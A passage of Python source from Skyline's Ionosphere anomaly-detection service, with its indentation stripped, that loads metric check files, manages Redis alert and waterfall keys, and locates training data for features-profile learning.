if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
return
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
def remove_waterfall_alert(added_by, metric_timestamp, base_name):
redis_waterfall_alert_set = '%s.waterfall_alerts.sent_to_ionosphere' % added_by
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_waterfall_alert_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_timestamp):
try:
self.redis_conn.srem(redis_waterfall_alert_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_waterfall_alert_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_waterfall_alert_set))
# @added 20201128 - Feature #3734: waterfall alerts
# If the check just done is newer than an existing mirage
# waterfall alert metric timestamp remove those keys as well
if int(waterfall_alert[1]) < metric_timestamp:
try:
self.redis_conn.srem(redis_waterfall_alert_set, str(waterfall_alert))
logger.info('removed waterfall alert item with older timestamp from Redis set %s - %s' % (
redis_waterfall_alert_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_waterfall_alert_set))
return
# @added 20200908 - Feature #3734: waterfall alerts
# Added a common return_to_sender_to_alert function
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
def return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run):
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration, algorithms_run]
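            # For illustration only (hypothetical values): with added_by
            # 'mirage', metric_timestamp 1609459200 and base_name
            # 'stats.server-1.cpu.user', the alert key created below would be
            #   ionosphere.mirage.alert.1609459200.stats.server-1.cpu.user
            # holding the str() of the cache_key_value list defined above.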
try:
self.redis_conn.setex(cache_key, 300, str(cache_key_value))
logger.info('added Redis alert key - %s - %s' % (
cache_key, str(cache_key_value)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s, %s]' %
(cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
str(triggered_algorithms), str(full_duration), str(algorithms_run)))
return
# @added 20210429 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the ionosphere.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous. This provides
# data for /panorama?not_anomalous and /panorama?not_anomalous_metric
# method which are used for plots in the webapp and json response.
# The ionosphere.panorama.not_anomalous_metrics Redis hash is managed in
# analyzer/metrics_manager
def add_not_anomalous_to_redis_hash(base_name, timestamp, value, full_duration):
redis_hash = 'ionosphere.panorama.not_anomalous_metrics'
try:
data = {
base_name: {
'timestamp': timestamp,
'value': value,
'hours_to_resolve': int(full_duration / 3600),
}
}
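                # A sketch of a resulting hash entry (hypothetical values):
                # the hash field is the float time() at which it was added and
                # the value is the str() of a dict like
                # {'stats.server-1.cpu.user': {'timestamp': 1609459200, 'value': 1.0, 'hours_to_resolve': 24}}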
self.redis_conn.hset(redis_hash, time(), str(data))
logger.info('added entry to the %s Redis hash' % redis_hash)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis hash %s - %s' % (
str(data), str(redis_hash), e))
child_process_pid = os.getpid()
logger.info('child_process_pid - %s' % str(child_process_pid))
try:
ionosphere_max_runtime = settings.IONOSPHERE_MAX_RUNTIME
except:
ionosphere_max_runtime = 120
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: processing metric check - %s' % metric_check_file)
if not os.path.isfile(str(metric_check_file)):
logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
return
engine = None
anomalous_timeseries = False
dev_null = None
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
failed_check_file = '%s/%s' % (metric_failed_check_dir, check_file_name)
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: failed_check_file - %s' % failed_check_file)
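        # For illustration only (hypothetical names): a check file named
        # 1609459200.stats.server-1.cpu.user.txt is split above into the
        # timestamp 1609459200 and the metric name stats.server-1.cpu.user,
        # so the failed check file would be
        # <failed_checks_dir>/stats/server-1/cpu/user/1609459200/1609459200.stats.server-1.cpu.user.txt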
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# From batch_processing metrics the learn check is being added and
# removed as the learn check for batch metrics happens immediately as
        # the learn after duration can have passed. So the check file needs to
        # be loaded to determine if it was added by ionosphere_learn before the
# check is just removed.
removed_check_file_work_done = False
# @added 20170307 - Feature #1960: ionosphere_layers - ionosphere_check_cache_key
# This Redis cache key check was added to prevent Ionosphere from
# running riot on checks if for some reason the check_file is not
# removed which happens if some exception is not handled as found out
# again during yesterday's development of run_layer_algorithms. It was
# a good reminder of how fast Skyline can iterate.
ionosphere_check_cache_key = 'ionosphere.check.%s' % check_file_name
check_done = False
try:
check_done = self.redis_conn.get(ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('check done check - no check cache key - %s' % ionosphere_check_cache_key)
else:
# @modified 20181113 - Task #2680: Remove Ionosphere check files is key exists
# This was here for initially debugging, no longer needed
# logger.error('error :: a check cache key exists - %s' % ionosphere_check_cache_key)
# logger.error('error :: failing check to prevent multiple iterations over this check')
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
logger.info('a check cache key exists - %s' % (ionosphere_check_cache_key))
# @modified 20200807 - Feature #3480: batch_processing
# logger.info('to prevent multiple iterations over this check removing %s' % (
logger.info('to prevent multiple iterations over this check it will be removed if not added by ionosphere_learn - %s' % (
str(metric_check_file)))
# self.remove_metric_check_file(str(metric_check_file))
# return
# @added 20200807 - Feature #3480: batch_processing
removed_check_file_work_done = True
try:
check_process_start = int(time())
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# redis-py 3.x only accepts user data as bytes, strings or
# numbers (ints, longs and floats). All 2.X users should
# make sure that the keys and values they pass into redis-py
# are either bytes, strings or numbers. Added cache_key_value
# self.redis_conn.setex(
# ionosphere_check_cache_key, 300, [check_process_start])
self.redis_conn.setex(
ionosphere_check_cache_key, 300, check_process_start)
logger.info(
'added Redis check key - %s' % (ionosphere_check_cache_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis check key - %s' % (ionosphere_check_cache_key))
logger.error('error :: failing check to prevent multiple iterations over this check')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# Load and validate metric variables
# @modified 20161231 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
# Use def new_load_metric_vars(self, metric_vars_file):
# metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# Test metric variables
        # We use a pythonic methodology to test whether the variables are
        # defined. This ensures that if any of the variables are not set for
        # some reason, unexpected data or situations can be handled gracefully
        # and the process does not hang.
metric = None
try:
# metric_vars.metric
# metric = str(metric_vars.metric)
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
base_name = metric
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
value = None
try:
# metric_vars.value
# value = str(metric_vars.value)
key = 'value'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
value = float(value_list[0])
anomalous_value = value
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - value - %s' % str(value))
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
value = None
if not value:
# @modified 20181119 - Bug #2708: Failing to load metric vars
if value == 0.0:
pass
else:
logger.error('error :: failed to load value variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
from_timestamp = None
try:
# metric_vars.from_timestamp
# from_timestamp = str(metric_vars.from_timestamp)
key = 'from_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
from_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - from_timestamp - %s' % str(from_timestamp))
except:
# @added 20160822 - Bug #1460: panorama check file fails
# Added exception handling here
logger.info(traceback.format_exc())
logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
if not from_timestamp:
logger.error('error :: failed to load from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
metric_timestamp = None
try:
# metric_vars.metric_timestamp
# metric_timestamp = str(metric_vars.metric_timestamp)
key = 'metric_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric_timestamp - %s' % str(metric_timestamp))
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
metric_timestamp = None
if not metric_timestamp:
logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# metric_vars.algorithms
# algorithms = metric_vars.algorithms
key = 'algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms - %s' % str(algorithms))
except:
logger.error('error :: failed to read algorithms variable from check file setting to all - %s' % (metric_check_file))
algorithms = 'all'
try:
# metric_vars.triggered_algorithms
# triggered_algorithms = metric_vars.triggered_algorithms
key = 'triggered_algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
triggered_algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - triggered_algorithms - %s' % str(triggered_algorithms))
except:
logger.error('error :: failed to read triggered_algorithms variable from check file setting to all - %s' % (metric_check_file))
triggered_algorithms = 'all'
added_by = None
try:
# metric_vars.added_by
# added_by = str(metric_vars.added_by)
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
try:
key = 'algorithms_run'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms_run = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms_run - %s' % str(algorithms_run))
except:
logger.error('error :: failed to read algorithms_run variable from check file setting to all - %s' % (metric_check_file))
if added_by == 'mirage':
algorithms_run = settings.MIRAGE_ALGORITHMS
else:
algorithms_run = settings.ALGORITHMS
# @added 20170117 - Feature #1854: Ionosphere learn - generations
if str(added_by) == 'ionosphere_learn':
logger.info('debug :: metric variable - added_by - %s' % added_by)
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
if removed_check_file_work_done:
logger.info('this check was added by ionosphere_learn so not removing check even though a check done Redis key exists')
removed_check_file_work_done = False
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
if removed_check_file_work_done:
logger.info('a check cache key exists and the check was not added by ionosphere_learn - %s' % (ionosphere_check_cache_key))
logger.info('to prevent multiple iterations over this check removing %s' % (
str(metric_check_file)))
# @added 20200908 - Feature #3734: waterfall alerts
# Remove waterfall alert item
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
return
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If added_by is analyzer_batch, log and change to analyzer so that
        # Ionosphere routes any alerts back to analyzer
if str(added_by) == 'analyzer_batch':
            logger.info('metric variable - added_by - %s, now switching to analyzer to route alerts to analyzer, thanks analyzer_batch' % added_by)
            added_by = 'analyzer'
logger.info('metric variable - added_by - %s, analyzer_batch checks will have alerts routed to analyzer' % added_by)
try:
# metric_vars.added_at
# added_at = str(metric_vars.added_at)
key = 'added_at'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_at = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_at - %s' % str(added_at))
except:
logger.error('error :: failed to read added_at variable from check file setting to all - %s' % (metric_check_file))
added_at = metric_timestamp
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Added full_duration which needs to be recorded to allow Mirage metrics
# to be profiled on Redis timeseries data at FULL_DURATION
full_duration = None
try:
# metric_vars.full_duration
# full_duration = str(metric_vars.full_duration)
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = None
ionosphere_parent_id_determined = False
try:
key = 'ionosphere_parent_id'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
ionosphere_parent_id = int(value_list[0])
ionosphere_parent_id_determined = True
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - ionosphere_parent_id - %s' % str(ionosphere_parent_id))
except:
logger.error('error :: failed to read ionosphere_parent_id variable from check file - %s' % (metric_check_file))
ionosphere_parent_id = None
if not ionosphere_parent_id_determined:
logger.error('error :: failed to determine ionosphere_parent_id variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @modified 20170116 - Feature #1854: Ionosphere learn
# Do not check the cache key or anomaly age if added by ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20170101 - Feature #1830: Ionosphere alerts
# Remove check file if an alert key exists
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
logger.info('no alert cache key - %s' % cache_key)
else:
logger.info('removing check - alert cache key exists - %s' % cache_key)
# @added 20200908 - Feature #3734: waterfall alerts
# Remove any waterfall_alert items
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
return
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Do not evaluate batch metrics against max_age_seconds
analyzer_batch_anomaly = None
if BATCH_PROCESSING:
# Is this a analyzer_batch related anomaly?
analyzer_batch_anomaly = None
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(metric_timestamp), metric)
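            # The key checked here looks like (hypothetical values)
            #   analyzer_batch.anomaly.1609459200.stats.server-1.cpu.user
            # and its presence is only used as a flag that the anomaly was
            # triggered by analyzer_batch.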
try:
analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('batch processing - not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if analyzer_batch_anomaly:
logger.info('batch anomaly not checking max_age_seconds for %s' % analyzer_batch_metric_anomaly_key)
else:
# @modified 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Wrapped in if analyzer_batch_anomaly
now = time()
anomaly_age = int(now) - int(metric_timestamp)
if anomaly_age > max_age_seconds:
logger.info(
'Ionosphere check max age exceeded - %s - %s seconds old, older than %s seconds discarding' % (
metric, str(anomaly_age), str(max_age_seconds)))
with open(metric_check_file, 'rt') as fr:
metric_check_file_contents = fr.readlines()
logger.info(
'debug :: metric check file contents\n%s' % (str(metric_check_file_contents)))
self.remove_metric_check_file(str(metric_check_file))
return
else:
logger.info('processing check_file for ionosphere_learn - %s' % str(metric_check_file))
# @added 20161222 - ionosphere should extract features for every anomaly
# check that is sent through and calculate a feature_profile ready for
# submission by the user if they so choose. Further ionosphere could
# make itself more useful by comparing any training data profiles to
# further anomalies, however the feature profiles for subsequent
# anomalies may be similar enough to match a few times and each a closer
# match to the next.
training_metric = False
metrics_id = None
metric_ionosphere_enabled = None
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the metrics_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
        # the generations values available in it. Here we go! Learn!
metrics_db_object = None
# @modified 20190325 - Feature #2484: FULL_DURATION feature profiles
# Moved get_metrics_db_object block to common_functions.py
try:
metrics_db_object = get_metrics_db_object(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine metrics_db_object from get_metrics_db_object for %s' % base_name)
if metrics_db_object:
metrics_id = None
try:
metrics_id = int(metrics_db_object['id'])
except:
# @added 20190509 - Bug #2984: Ionosphere - could not determine values from metrics_db_object
# Added a traceback here to debug an issue
logger.error(traceback.format_exc())
logger.error('error :: could not determine id from metrics_db_object for %s' % base_name)
metrics_id = None
metric_ionosphere_enabled = None
training_metric = True
if metrics_id:
# @modified 20190510 - Bug #2984: Ionosphere - could not determine values from metrics_db_object
# metric_ionosphere_enabled = int(metrics_db_object['ionosphere_enabled'])
metric_ionosphere_enabled = None
try:
metric_ionosphere_enabled = metrics_db_object['ionosphere_enabled']
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled from metrics_db_object for %s' % base_name)
if metric_ionosphere_enabled is not None:
training_metric = False
else:
training_metric = True
if metric_ionosphere_enabled == 1:
training_metric = False
if metric_ionosphere_enabled == 0:
training_metric = True
else:
metrics_id = None
metric_ionosphere_enabled = None
training_metric = True
logger.error('error :: could not determine metric id from memcache or metrics tables for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if namespace has matched multiple times in the
# last 10 minutes. However determining which Skyline related metrics
        # are feeding back is quite difficult to ascertain. So use the
# ionosphere_busy logic again and use or find the skyline host namespace
# and if busy do not analyse the Skyline host namespace while
# ionosphere is busy.
feedback_metric = False
if ionosphere_busy:
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
break
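            # A sketch of the matching above (hypothetical names): with a
            # base_name of 'skyline-1.vista.fetcher.metrics_fetched', a
            # SKYLINE_FEEDBACK_NAMESPACES entry of 'skyline-1' matches the
            # substring test, while an entry of 'fetcher.skyline-1' is not a
            # substring but still matches because every one of its dotted
            # elements is present in the base_name elements.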
# @added 20210702 - Feature #4152: DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES
if feedback_metric:
for do_not_skip in DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES:
pattern_match = False
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES)
del metric_matched_by
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: matched_or_regexed_in_list failed checking %s in DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES - %s' % (
base_name, e))
pattern_match = False
if pattern_match:
feedback_metric = False
logger.info('%s matched DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES, will analyse' % base_name)
if feedback_metric:
cache_key = 'ionosphere.feedback_metric.checked.%s' % (base_name)
logger.info('feedback metric identified adding Redis key with 600 TTL - %s' % cache_key)
try:
self.redis_conn.setex(cache_key, 600, int(time()))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s key to Redis' % (
str(cache_key)))
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is a match.
metric_max_generations = None
if added_by == 'ionosphere_learn':
try:
metric_max_generations = int(metrics_db_object['max_generations'])
                logger.info('determining max_generations for ionosphere_learn check - %s - %s' % (str(metric_max_generations), base_name))
except:
logger.error(traceback.format_exc())
                logger.error('error :: ionosphere_learn check could not determine the metric max_generations from the metrics_db_object for %s' % base_name)
if not metric_max_generations:
                logger.error('error :: ionosphere_learn check cannot continue without max_generations for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis ionosphere.ionosphere_non_smtp_alerter_metrics list is created here to
# replace the self.ionosphere_non_smtp_alerter_metrics Manager.list in the below
# section
ionosphere_non_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_non_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
ionosphere_non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere.ionosphere_non_smtp_alerter_metrics Redis set')
ionosphere_non_smtp_alerter_metrics = []
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only process smtp_alerter_metrics
if training_metric:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name in self.ionosphere_non_smtp_alerter_metrics:
if base_name in ionosphere_non_smtp_alerter_metrics:
# @modified 20191114 - Feature #: forward_alert
# Allow ionosphere to check any metrics that have an alerter other than smtp set, apart from syslog
# logger.error('error :: Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s' % (base_name))
                logger.info('Ionosphere does not handle metrics that do not have an smtp alert context, removing check for %s which is a training_metric' % (base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.training_metrics.append(base_name)
redis_set = 'ionosphere.training_metrics'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
logger.info(
'ionosphere_enabled is %s for metric id %s - %s' % (
str(metric_ionosphere_enabled), str(metrics_id),
base_name))
if training_metric:
logger.info('Ionosphere is not enabled on %s' % (base_name))
else:
logger.info('Ionosphere is enabled on %s' % (base_name))
# @added 20161210 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Only continue if there is a training data json timeseries file
metric_timeseries_dir = base_name.replace('.', '/')
# @modified 20170115 - Feature #1854: Ionosphere learn
# Allowing the bifurcation of the metric_training_data_dir based on
# whether added_by is ionosphere_learn or not, this allows Ionosphere to
# be brought online to start evaluating the learn features profiles at
# 30 days or whatever the learn_full_duration_days is for the metric
# that is being automatically learnt uses these fuller duration features
# to determine if a new training data set has been created for an
# ionosphere_enabled metric. Here Ionosphere starts to try and get
# clever, let us hope not too clever, but this is where the
# max_percent_diff_from_origin and max_generations comes in. So ...
# here we go, a really "Crazy feedback loop" @astanway :) I would say
# that this is going to be way more useful than the last referenced one
# in https://github.com/etsy/skyline/pull/90#r13592782 ;) This is it
# 20170115202500 UTC Ionosphere really is now really going to begin.
# Here we go! Learn!
# metric_training_data_dir = '%s/%s/%s' % (
# settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
# metric_timeseries_dir)
if added_by != 'ionosphere_learn':
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
metric_timeseries_dir)
else:
# Here we go! Learn you bugger! SUCH A BIG THANKS TO tsfresh!
# And flowjob and The White Stripes, @matzhouse, her and the Dude.
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_LEARN_FOLDER, metric_timestamp,
metric_timeseries_dir)
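        # For illustration only (hypothetical values): for base_name
        # 'stats.server-1.cpu.user' and metric_timestamp 1609459200 the
        # training data dir resolves to
        #   <IONOSPHERE_DATA_FOLDER>/1609459200/stats/server-1/cpu/user
        # or, for ionosphere_learn checks,
        #   <IONOSPHERE_LEARN_FOLDER>/1609459200/stats/server-1/cpu/user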
anomaly_json = '%s/%s.json' % (metric_training_data_dir, base_name)
if os.path.isfile(anomaly_json):
logger.info('training data ts json available - %s' % (anomaly_json))
else:
logger.error('error :: training data ts json was not found - %s' % (anomaly_json))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# The timeseries full_duration needs to be recorded to allow Mirage metrics to
# be profiled on Redis timeseries data at FULL_DURATION
# e.g. mirage.redis.24h.json
if training_metric:
logger.info('training metric - %s' % (base_name))
redis_anomaly_json = False
if added_by == 'mirage':
logger.info('checking training data Redis json is available')
# Always calculate features for both the SECOND_ORDER_RESOLUTION_SECONDS
# timeseries data and the FULL_DURATION Redis timeseries data.
# It is always preferable to create a features profile on a FULL_DURATION
# data set, unless the user is flagging the actual Mirage timeseries as
# not anomalous. In the Mirage context the not anomalous may often be more
# "visibile" in the FULL_DURATION view and if so should be matched on the
# FULL_DURATION timeseries data, even if it is a Mirage metric.
# Features profiles can be created for a Mirage metric on both the
# FULL_DURATION and the SECOND_ORDER_RESOLUTION_SECONDS data sets, however
# only one should be needed.
# A features profile should always be created at the highest resolution
# possible, FULL_DURATION data, wherever possible.
try:
full_duration_hours = str(int(settings.FULL_DURATION / 3600))
redis_anomaly_json = '%s/%s.mirage.redis.%sh.json' % (metric_training_data_dir, base_name, full_duration_hours)
if os.path.isfile(redis_anomaly_json):
logger.info('training data Redis full duration ts json available - %s' % (redis_anomaly_json))
else:
                        logger.info('training data Redis full duration json was not found - %s' % (redis_anomaly_json))
except:
logger.error(traceback.format_exc())
logger.error('error :: training data Redis full duration json was not found - %s' % (redis_anomaly_json))
# @added 20161209 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Use SQLAlchemy, mysql.connector is still upstairs ^^ but starting the
# move to SQLAlchemy now that all the webapp Ionosphere SQLAlchemy
        # patterns work and the database layout is defined we can begin on the
